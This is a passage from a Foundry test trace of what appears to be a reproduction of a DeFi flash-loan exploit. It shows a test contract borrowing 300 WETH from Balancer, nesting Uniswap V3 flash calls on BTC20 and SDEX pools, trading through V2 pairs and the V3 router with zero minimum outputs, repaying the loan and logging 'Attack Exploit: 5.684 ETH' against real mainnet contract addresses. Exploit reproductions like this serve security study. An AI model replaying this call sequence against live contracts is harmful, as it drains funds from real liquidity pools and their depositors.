    │   │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 35634716485904608808 [3.563e19], reserve1: 162716349528596509209199 [1.627e23])
    │   │   │   │   │   │   │   │   ├─ emit Swap(sender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 8156206089568455506 [8.156e18], amount1In: 0, amount0Out: 0, amount1Out: 48152778937799338221641 [4.815e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 8: 0x64e0c80f000000002ca73d0523a977c392b80000000000017d57479e3a7ea2d6 → 0x64e0c80f000000002274def8bc1726b5b26f000000000001ee87f1d7d619ae28
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   └─ ← [Return] [8156206089568455506 [8.156e18], 48152778937799338221641 [4.815e22]]
    │   │   │   │   │   │   ├─ [3927] BTC20::transfer(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], 48152778937799338221641 [4.815e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e], value: 48152778937799338221641 [4.815e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000176f5dd4bf9ba15de049 → 0x000000000000000000000000000000000000000000000d3cffc8580950500000
    │   │   │   │   │   │   │   │   @ 0xd4915abfd7c644b3b84dad9d8bdf3a82df5587deae7bc6b9047d17410a4786d9: 0x00000000000000000000000000000000000000000000001a1b357445df941892 → 0x000000000000000000000000000000000000000000000a4c7941dbd830a1f8db
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xcb7c14ce178f56e2e8d86ab33ebc0ae081ba8556a00cd122038841867181caac: 0 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   │   │   │   │   @ 1: 2 → 1
    │   │   │   │   │   │   │   @ 0xcb7c14ce178f56e2e8d86ab33ebc0ae081ba8556a00cd122038841867181caad: 0 → 0x000000000000000000000000e86df1970055e9caee93dae9b7d5fd71595d0e18
    │   │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [534] WETH::balanceOf(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 2330602740225707965 [2.33e18]
    │   │   │   │   │   ├─ [930] BTC20::balanceOf(BTC20_WETH_Pair3: [0x7234c91bd835a6Ed108c8e986E0663B14F9DE14e]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 48634354884772028872923 [4.863e22]
    │   │   │   │   │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 47676018750296374476872 [4.767e22], param4: 0, param5: 476760187502963744769 [4.767e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 2: 0x0000000000000000000000000000000222cef9ee27dbd959eaf81890d1bbbd1a → 0x000000000000000000000000000000037e5503981e7780de8ad6605a43c6d7e3
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 330932342854937006276 [3.309e20]
    │   │   │   │   ├─ [29184] uniRouter::swapTokensForExactTokens(77064052479763626931164 [7.706e22], 330932342854937006276 [3.309e20], [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─ [504] BTC20_WETH_Pair2::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 35634716485904608808 [3.563e19], 162716349528596509209199 [1.627e23], 1692452879 [1.692e9]
    │   │   │   │   │   ├─ [3425] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], 32158144183281539785 [3.215e19])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], value: 32158144183281539785 [3.215e19])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x0f7bdfeaaa6aac90f639b23d473b6781f265b3d20dd2b1c8a4d7470ba48dfe82: 0x000000000000000000000000000000000000000000000001ee87f1d7d619ae28 → 0x000000000000000000000000000000000000000000000003acd09f98be6408f1
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000011f09bdc78cc4cd0c4 → 0x00000000000000000000000000000000000000000000001032532eb7e40275fb
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [17498] BTC20_WETH_Pair2::swap(0, 77064052479763626931164 [7.706e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   │   ├─ [3927] BTC20::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 77064052479763626931164 [7.706e22])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 77064052479763626931164 [7.706e22])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xbea5b04db1b78cf192261e74182d61f2109de26dab2d36535c635a97c54b15f2: 0x000000000000000000000000000000000000000000002274def8bc1726b5b26f → 0x0000000000000000000000000000000000000000000012233867589832b47e93
    │   │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000d3cffc8580950500000 → 0x000000000000000000000000000000000000000000001d8ea659bb88445133dc
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [534] WETH::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 67792860669186148593 [6.779e19]
    │   │   │   │   │   │   ├─ [930] BTC20::balanceOf(BTC20_WETH_Pair2: [0xd50C5B8f04587D67298915E099E170af3Cd6909A]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 85652297048832882278035 [8.565e22]
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 67792860669186148593 [6.779e19], reserve1: 85652297048832882278035 [8.565e22])
    │   │   │   │   │   │   ├─ emit Swap(sender: uniRouter: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], amount0In: 32158144183281539785 [3.215e19], amount1In: 0, amount0Out: 0, amount1Out: 77064052479763626931164 [7.706e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 8: 0x64e0c80f000000002274def8bc1726b5b26f000000000001ee87f1d7d619ae28 → 0x64e0c80f0000000012233867589832b47e93000000000003acd09f98be6408f1
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return] [32158144183281539785 [3.215e19], 77064052479763626931164 [7.706e22]]
    │   │   │   │   ├─ [3927] BTC20::transfer(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], 77064052479763626931164 [7.706e22])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], value: 77064052479763626931164 [7.706e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb80a4a6f316d25108ca734efbfa7bbfe63a558e20d520dcbd5ccf677206b709a: 0x000000000000000000000000000000000000000000000029c7daf2a1cc36cd30 → 0x00000000000000000000000000000000000000000000107b6e6c5620c038010c
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000001d8ea659bb88445133dc → 0x000000000000000000000000000000000000000000000d3cffc8580950500000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0: 0x0000000001000100000117e00000000000000023f451fba18780806d1ebdf991 → 0x0001000001000100000117e00000000000000023f451fba18780806d1ebdf991
    │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [539] SDEX::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   └─ ← [Return] 1348723216560827653503193 [1.348e24]
    │   │   │   ├─ [930] BTC20::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   └─ ← [Return] 77834770076320918929676 [7.783e22]
    │   │   │   ├─ emit Flash(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 0, param3: 76301042059171907852637 [7.63e22], param4: 0, param5: 763010420591719078527 [7.63e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 2: 0x00000000000000000000000000000000012c20b6bd3c0ff7d3cfb61045ccd789 → 0x00000000000000000000000000000000017d26e859c930edda6caaf02698c81b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [930] BTC20::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 62516000000000000000000 [6.251e22]
    │   │   ├─ [125602] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0xE86DF1970055e9CaEe93Dae9B7D5fD71595d0e18, tokenOut: 0x5DE8ab7E27f6E7A1fFf3E5B337584Aa43961BEeF, fee: 10000 [1e4], recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], amountIn: 62516000000000000000000 [6.251e22], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [120641] SDEX_BTC20_Pair3::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], false, 62516000000000000000000 [6.251e22], 1461446703485210103287273052203988822378723970341 [1.461e48], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002be86df1970055e9caee93dae9b7d5fd71595d0e180027105de8ab7e27f6e7a1fff3e5b337584aa43961beef000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [27734] SDEX::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1270785781943626791086803 [1.27e24])
    │   │   │   │   │   ├─ emit Transfer(from: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1270785781943626791086803 [1.27e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x3518faacf4f2af5a71cfe86f330df57a4321017d8432a2a7caa6a00727c29226: 0x000000000000000000000000000000000000000000011d9a6e9c6436e67938d9 → 0x000000000000000000000000000000000000000000001080ff2e0e1e41d1ce06
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000010d196f6e5618a4a76ad3
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [930] BTC20::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 77834770076320918929676 [7.783e22]
    │   │   │   │   ├─ [15821] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(-1270785781943626791086803 [-1.27e24], 62516000000000000000000 [6.251e22], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002be86df1970055e9caee93dae9b7d5fd71595d0e180027105de8ab7e27f6e7a1fff3e5b337584aa43961beef000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [11735] BTC20::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], 62516000000000000000000 [6.251e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385], value: 62516000000000000000000 [6.251e22])
    │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE592427A0AEce92De3Edee1F18E0157C05861564, value: 115792089237316195423570985008687907853269984665640563976941584007913129639935 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xb8b3dd7b343e4967bcca95a8f7fb77b7990e98e0367fb174bf8dfeca3548cc2e: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffff2c30037a7f6afafffff
    │   │   │   │   │   │   │   @ 0xb80a4a6f316d25108ca734efbfa7bbfe63a558e20d520dcbd5ccf677206b709a: 0x00000000000000000000000000000000000000000000107b6e6c5620c038010c → 0x000000000000000000000000000000000000000000001db86e34ae2a1088010c
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000d3cffc8580950500000 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [930] BTC20::balanceOf(SDEX_BTC20_Pair3: [0xDb81b8cfB2718f7289ae2365DE800ac2c787E385]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 140350770076320918929676 [1.403e23]
    │   │   │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: -1270785781943626791086803 [-1.27e24], param3: 62516000000000000000000 [6.251e22], param4: 1565614511106840333031549775525 [1.565e30], param5: 2598746457129766976968 [2.598e21], param6: 59677 [5.967e4])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x01000003d800000000000000d655ab7a77a55d2347fffff6a26ebf9064e0c563 → 0x01000003d800000000000000d65ae7572518de54f9fffff6a06ba3d864e0c80f
    │   │   │   │   │   @ 2: 0x00000000000000000000000000000000017d26e859c930edda6caaf02698c81b → 0x00000000000000000000000000000000345e4b6581f16232def3a52b34dfcdbd
    │   │   │   │   │   @ 0: 0x000100000100010000ff3f36000000000000000015b4dc00505b6361bad8d135 → 0x00010000010001000000e91d0000000000000013c2c5f866d7e67111bd552ea5
    │   │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000082b02640742e216bf636 → 0x00000000000000000000000000000000000000000000008ce0da1602bca97dc8
    │   │   │   │   │   @ 0x3873a65c799924f2d203aa0c334d9e98d23d4847d18a1f23d207c65a7d945c76: 0x0000000000000000000000000000000009822e038d4af5376a4a4262597f5614 → 0x00000000000000000000000000000000d2dfc661626acf78e79ceea655f61866
    │   │   │   │   │   @ 0x3873a65c799924f2d203aa0c334d9e98d23d4847d18a1f23d207c65a7d945c78: 0x010000e19c000000000000000000000000afb5831845f4062dffffff63d01dc4 → 0x0164dfe673000003d800000000000000d5ab31d40cd2ea4eccfffff73c9b8614
    │   │   │   │   │   @ 0x3873a65c799924f2d203aa0c334d9e98d23d4847d18a1f23d207c65a7d945c77: 0x00000000000000000000000000000000001ab4408d6a427ded7e9ff7fa1def57 → 0x00000000000000000000000000000000016e0928b7a010536b76895426396961
    │   │   │   │   └─ ← [Return] -1270785781943626791086803 [-1.27e24], 62516000000000000000000 [6.251e22]
    │   │   │   └─ ← [Return] 1270785781943626791086803 [1.27e24]
    │   │   ├─ [539] SDEX::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 1270785781943626791086803 [1.27e24]
    │   │   ├─ [70147] 0xE592427A0AEce92De3Edee1F18E0157C05861564::exactInputSingle(ExactInputSingleParams({ tokenIn: 0x5DE8ab7E27f6E7A1fFf3E5B337584Aa43961BEeF, tokenOut: 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, fee: 10000 [1e4], recipient: 0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496, deadline: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77], amountIn: 1270785781943626791086803 [1.27e24], amountOutMinimum: 0, sqrtPriceLimitX96: 0 }))
    │   │   │   ├─ [62715] 0xC7cbFF2a23D0926604F9352f65596e65729b8a17::swap(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], true, 1270785781943626791086803 [1.27e24], 4295128740 [4.295e9], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b5de8ab7e27f6e7a1fff3e5b337584aa43961beef002710c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [8062] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 6910532528747182970 [6.91e18])
    │   │   │   │   │   ├─ emit Transfer(from: 0xC7cbFF2a23D0926604F9352f65596e65729b8a17, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6910532528747182970 [6.91e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xc699040dc972be7540a4eb9a78873e07ec3f0fd55a6726127675aca9a78e75af: 0x0000000000000000000000000000000000000000000000023d7b8de9c4f3f7d7 → 0x000000000000000000000000000000000000000000000001dd9469311c31fc5d
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001032532eb7e40275fb → 0x000000000000000000000000000000000000000000000010923a53708cc47175
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2539] SDEX::balanceOf(0xC7cbFF2a23D0926604F9352f65596e65729b8a17) [staticcall]
    │   │   │   │   │   └─ ← [Return] 110933204646354143031650572 [1.109e26]
    │   │   │   │   ├─ [12276] 0xE592427A0AEce92De3Edee1F18E0157C05861564::uniswapV3SwapCallback(1270785781943626791086803 [1.27e24], -6910532528747182970 [-6.91e18], 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000400000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496000000000000000000000000000000000000000000000000000000000000002b5de8ab7e27f6e7a1fff3e5b337584aa43961beef002710c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [8220] SDEX::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xC7cbFF2a23D0926604F9352f65596e65729b8a17, 1270785781943626791086803 [1.27e24])
    │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xC7cbFF2a23D0926604F9352f65596e65729b8a17, value: 1270785781943626791086803 [1.27e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xf648d92fd645f9c82ffe0d17cd8287e644a91a6c28594dc1120a86a052431188: 0x0000000000000000000000000000000000000000005bc30512ec47141550e90c → 0x0000000000000000000000000000000000000000005cd01e825a9d2cb9f853df
    │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000010d196f6e5618a4a76ad3 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [539] SDEX::balanceOf(0xC7cbFF2a23D0926604F9352f65596e65729b8a17) [staticcall]
    │   │   │   │   │   └─ ← [Return] 112203990428297769822737375 [1.122e26]
    │   │   │   │   ├─ emit Swap(param0: 0xE592427A0AEce92De3Edee1F18E0157C05861564, param1: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 1270785781943626791086803 [1.27e24], param3: -6910532528747182970 [-6.91e18], param4: 185101461909130131834038547 [1.851e26], param5: 466763672288567730840988 [4.667e23], param6: -121190 [-1.211e5])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0: 0x000100000100010000fe27180000000000000000009a15263bed87ec441708a6 → 0x000100000100010000fe269a000000000000000000991cc25b4a89585fc66913
    │   │   │   │   │   @ 8: 0x010000000000000000000006928c28768b50b14e84ffff02f9a5b92464e0c653 → 0x0100000000000000000000069290a66e3ae20bd347ffff02f67186c464e0c80f
    │   │   │   │   │   @ 1: 0x000000000000000000000000000000327a5572bd700117e0db209043e9f09d32 → 0x00000000000000000000000000000032814db23d5b35ef531d129b0f5b3704aa
    │   │   │   │   └─ ← [Return] 1270785781943626791086803 [1.27e24], -6910532528747182970 [-6.91e18]
    │   │   │   └─ ← [Return] 6910532528747182970 [6.91e18]
    │   │   ├─ [3262] WETH::transfer(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], 300000000000000000000 [3e20])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8], value: 300000000000000000000 [3e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x3a0f132b80eb284c2ac247698d2ec7dce851ca420b700161ad6082d0e9762150: 0x000000000000000000000000000000000000000000000e81bcf1bfacafca21ab → 0x000000000000000000000000000000000000000000000e920047da34d8fa21ab
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000010923a53708cc47175 → 0x0000000000000000000000000000000000000000000000004ee438e863947175
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0: 0x000000000100010000ff3f36000000000000000015b4dc00505b6361bad8d135 → 0x00010000010001000000e91d0000000000000013c2c5f866d7e67111bd552ea5
    │   │   │   @ 0xcb7c14ce178f56e2e8d86ab33ebc0ae081ba8556a00cd122038841867181caad: 0x000000000000000000000000e86df1970055e9caee93dae9b7d5fd71595d0e18 → 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2
    │   │   │   @ 0xcb7c14ce178f56e2e8d86ab33ebc0ae081ba8556a00cd122038841867181caac: 0x000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2 → 0x000000000000000000000000e86df1970055e9caee93dae9b7d5fd71595d0e18
    │   │   └─ ← [Stop]
    │   ├─ [534] WETH::balanceOf(Balancer: [0xBA12222222228d8Ba445958a75a0704d566BF2C8]) [staticcall]
    │   │   └─ ← [Return] 68806375619580487410091 [6.88e22]
    │   ├─ emit FlashLoan(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], param2: 300000000000000000000 [3e20], param3: 0)
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5684731200402649461 [5.684e18]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5684731200402649461 [5.684e18]
    ├─ [0] console::log("Attack Exploit: %s.%s ETH", 5, 684731200402649461 [6.847e17]) [staticcall]
    │   └─ ← [Stop]
    ├─  storage changes:
    │   @ 0: 2 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 20.48s (15.86s CPU time)

Ran 2 test suites in 21.75s (21.12s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
